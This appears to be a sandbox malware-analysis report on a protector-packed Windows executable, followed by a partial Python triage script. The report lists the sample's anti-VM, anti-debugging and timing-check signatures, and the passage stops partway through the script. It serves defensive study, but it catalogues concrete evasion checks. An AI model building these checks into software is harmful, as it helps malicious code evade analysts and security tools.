Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EE09C5 second address: 6EE0A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA68B945C3h 0x00000009 sub eax, 11A1661Eh 0x0000000f jmp 00007FFA68B945C9h 0x00000014 popfd 0x00000015 mov bx, si 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EE0A09 second address: 6EE0A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EE0A0F second address: 6EE0A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EE0A20 second address: 6EE0A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EE0A24 second address: 6EE0A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA68B945BFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EE0A41 second address: 6EE0A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA429h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EC001F second address: 6EC0023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EC0023 second address: 6EC0029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EC0029 second address: 6EC007C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFA68B945BAh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FFA68B945BBh 0x0000000f and ecx, 35E0EB7Eh 0x00000015 jmp 00007FFA68B945C9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f jmp 00007FFA68B945BEh 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov ebx, esi 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC007C second address: 6EC00AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA424h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA692CA427h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC00AE second address: 6EC00B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC00B4 second address: 6EC0173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f mov ax, 1681h 0x00000013 mov ax, 99BDh 0x00000017 popad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FFA692CA428h 0x0000001f adc ah, FFFFFFC8h 0x00000022 jmp 00007FFA692CA41Bh 0x00000027 popfd 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b popad 0x0000002c and esp, FFFFFFF0h 0x0000002f pushad 0x00000030 pushad 0x00000031 mov si, F237h 0x00000035 mov ax, 7AD3h 0x00000039 popad 0x0000003a pushad 0x0000003b mov dx, cx 0x0000003e pushfd 0x0000003f jmp 00007FFA692CA422h 0x00000044 add esi, 341ECA58h 0x0000004a jmp 00007FFA692CA41Bh 0x0000004f popfd 0x00000050 popad 0x00000051 popad 0x00000052 sub esp, 44h 0x00000055 jmp 00007FFA692CA426h 0x0000005a xchg eax, ebx 0x0000005b jmp 00007FFA692CA420h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FFA692CA41Eh 0x00000068 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0173 second address: 6EC01F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007FFA68B945BBh 0x00000012 sub esi, 44636BDEh 0x00000018 jmp 00007FFA68B945C9h 0x0000001d popfd 0x0000001e pop eax 0x0000001f push edi 0x00000020 call 00007FFA68B945BCh 0x00000025 pop eax 0x00000026 pop edx 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 jmp 00007FFA68B945BEh 0x0000002e push eax 0x0000002f jmp 00007FFA68B945BBh 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FFA68B945C5h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC01F5 second address: 6EC0263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA692CA427h 0x00000008 pushfd 0x00000009 jmp 00007FFA692CA428h 0x0000000e or esi, 262602F8h 0x00000014 jmp 00007FFA692CA41Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, edi 0x0000001e pushad 0x0000001f mov dl, cl 0x00000021 mov edx, 00ACB0D4h 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FFA692CA429h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0263 second address: 6EC0269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0269 second address: 6EC026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC026D second address: 6EC02DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007FFA68B945C6h 0x00000011 mov edi, dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 mov si, 76ADh 0x00000019 movzx esi, di 0x0000001c popad 0x0000001d mov dword ptr [esp+24h], 00000000h 0x00000025 jmp 00007FFA68B945C5h 0x0000002a lock bts dword ptr [edi], 00000000h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FFA68B945BDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC02DA second address: 6EC0312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA421h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FFAD92CC55Ah 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FFA692CA41Ah 0x00000018 adc ch, 00000008h 0x0000001b jmp 00007FFA692CA41Bh 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0312 second address: 6EC0355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edi 0x0000000b jmp 00007FFA68B945BEh 0x00000010 pop esi 0x00000011 jmp 00007FFA68B945C0h 0x00000016 pop ebx 0x00000017 jmp 00007FFA68B945C0h 0x0000001c mov esp, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0355 second address: 6EC0359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0359 second address: 6EC035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC035D second address: 6EC0363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0363 second address: 6EC0369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0369 second address: 6EC036D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC036D second address: 6EC0371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0371 second address: 6EC0395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFA692CA429h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EC0395 second address: 6EC039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF08B0 second address: 6EF08B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF08B4 second address: 6EF08D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF08D1 second address: 6EF0949 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA692CA427h 0x00000009 adc si, EACEh 0x0000000e jmp 00007FFA692CA429h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FFA692CA420h 0x0000001a add eax, 6DAF9348h 0x00000020 jmp 00007FFA692CA41Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FFA692CA425h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0949 second address: 6EF0959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0959 second address: 6EF097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFA692CA428h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF097E second address: 6EF0984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0984 second address: 6EF0995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA41Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0995 second address: 6EF0999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0999 second address: 6EF09BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFA692CA428h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF09BC second address: 6EF09E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA68B945C2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF09E2 second address: 6EF09E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF09E6 second address: 6EF0A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a popad 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA68B945C2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0A06 second address: 6EF0A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA41Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0B6A second address: 6EF0B7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0B7F second address: 6EF0B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6EF0B85 second address: 6EF0BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FFA68B945BFh 0x0000000e mov ebp, esp 0x00000010 jmp 00007FFA68B945C6h 0x00000015 push dword ptr [ebp+04h] 0x00000018 jmp 00007FFA68B945C0h 0x0000001d push dword ptr [ebp+0Ch] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FFA68B945C7h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSpecial instruction interceptor: First address: A38528 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSpecial instruction interceptor: First address: A36C26 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSpecial instruction interceptor: First address: 88BCEF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSpecial instruction interceptor: First address: ABFD31 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc (the Display adapters device class; DriverDesc names the virtual GPU on a VM)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Code function: 1_2_06ED0CA7 rdtsc 1_2_06ED0CA7
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Code function: 1_2_06F304CE sldt word ptr [eax] 1_2_06F304CE (LDTR read, a legacy hypervisor heuristic)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | API coverage: 4.1 %
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | File Volume queried: C:\ FullSizeInformation
Source: 5ZH9uXmzGP.exe, 5ZH9uXmzGP.exe, 00000001.00000002.2414578137.0000000000A17000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.5.dr | Binary or memory string: VMware
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.5.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr | Binary or memory string: vmci.sys
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.5.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.000000000142B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: Amcache.hve.5.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2414578137.0000000000A17000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2263569783.00000000067B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!
Source: Amcache.hve.5.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Process information queried: ProcessInformation

Note on reading the rows above: everything sourced from Amcache.hve.5.dr is the analysis VM's own Amcache hive (collected as a dropped file of the run), so the VMware and Hyper-V strings there describe the sandbox host, not checks performed by the sample. The sample's own VM checks are the VBOX__ ACPI table, the VBoxSF service key, the C:\Windows\System32\VBox*.dll probe and the BIOS/video registry values queried above. The SYSINTERNALS... string block from the sample's memory also lists its process-name check list (WINDBG.EXE, wireshark.exe, procmon.exe, x64dbg.exe, ida.exe) and an installed-application inventory via the Uninstall keys, and the Oreans.vxd and Software\WinLicense strings are artifacts of the Oreans WinLicense/Themida protector the binary is packed with.

Anti Debugging

Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Thread information set: HideFromDebugger (NtSetInformationThread with ThreadHideFromDebugger; the thread stops delivering debug events to an attached debugger)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Open window title or class name: regmonclass (Sysinternals Regmon window class)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Open window title or class name: gbdyllo ("OLLYDBG" reversed, an OllyDbg probe)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Open window title or class name: procmon_window_class (Sysinternals Process Monitor window class)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Open window title or class name: filemonclass (Sysinternals Filemon window class)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | File opened: NTICE (SoftICE driver device name)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | File opened: SICE (SoftICE driver device name)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | File opened: SIWVID (SoftICE driver device name)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Process queried: DebugPort (NtQueryInformationProcess with ProcessDebugPort; 5 occurrences)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Code function: 1_2_06ED0CA7 rdtsc 1_2_06ED0CA7
Source: 5ZH9uXmzGP.exe, 5ZH9uXmzGP.exe, 00000001.00000002.2414578137.0000000000A17000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: /uProgram Manager
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation (5 occurrences)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: msmpeng.exe
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe
Source: Amcache.hve.5.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: MsMpEng.exe
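The evasion and anti-debugging rows above are easier to digest as a per-technique summary than as a raw list. The following Python is an added triage example, not part of the Joe Sandbox report or of the sample: it parses the flattened `Source: <path><signature label>: <value>` rows of the two sections above (in the extracted report the signature label is glued to the source path), groups them into technique families and maps each family to an ATT&CK ID. The family names, the `classify` and `triage` helpers and the ATT&CK mapping are my own choices. The window-class table encodes the well-known facts that regmonclass, filemonclass and procmon_window_class are the Sysinternals monitor window classes, that ollydbg and gbdyllo ("OLLYDBG" reversed) are OllyDbg probes, and that NTICE, SICE and SIWVID are SoftICE device names; this set of probes is typical of the Oreans WinLicense/Themida protector whose strings appear above. `SAMPLE_ROWS` is a constructed subset of rows copied from this report.

```python
"""Triage helper for the flattened signature rows of a Joe Sandbox report.

Rows read 'Source: <path><signature label>: <value>'; in the extracted report the
label is glued to the source path. Each row is classified into an anti-analysis
technique family and the families are mapped to ATT&CK IDs.
"""
import re
from collections import Counter

LABELS = (
    "RDTSC instruction interceptor", "Special instruction interceptor",
    "Registry key queried", "Open window title or class name", "File opened",
    "Process queried", "Thread information set", "Code function",
)
_ROW = re.compile(r"^Source:\s*(?P<src>.*?)(?P<label>%s):\s*(?P<val>.*)$"
                  % "|".join(map(re.escape, LABELS)))

# Window classes / titles of analysis tools that protectors probe with FindWindow().
WINDOW_TOOLS = {
    "ollydbg": "OllyDbg", "gbdyllo": "OllyDbg",          # gbdyllo is OLLYDBG reversed
    "procmon_window_class": "Process Monitor",
    "process monitor - sysinternals: www.sysinternals.com": "Process Monitor",
    "regmonclass": "Regmon",
    "registry monitor - sysinternals: www.sysinternals.com": "Regmon",
    "filemonclass": "Filemon",
    "file monitor - sysinternals: www.sysinternals.com": "Filemon",
}
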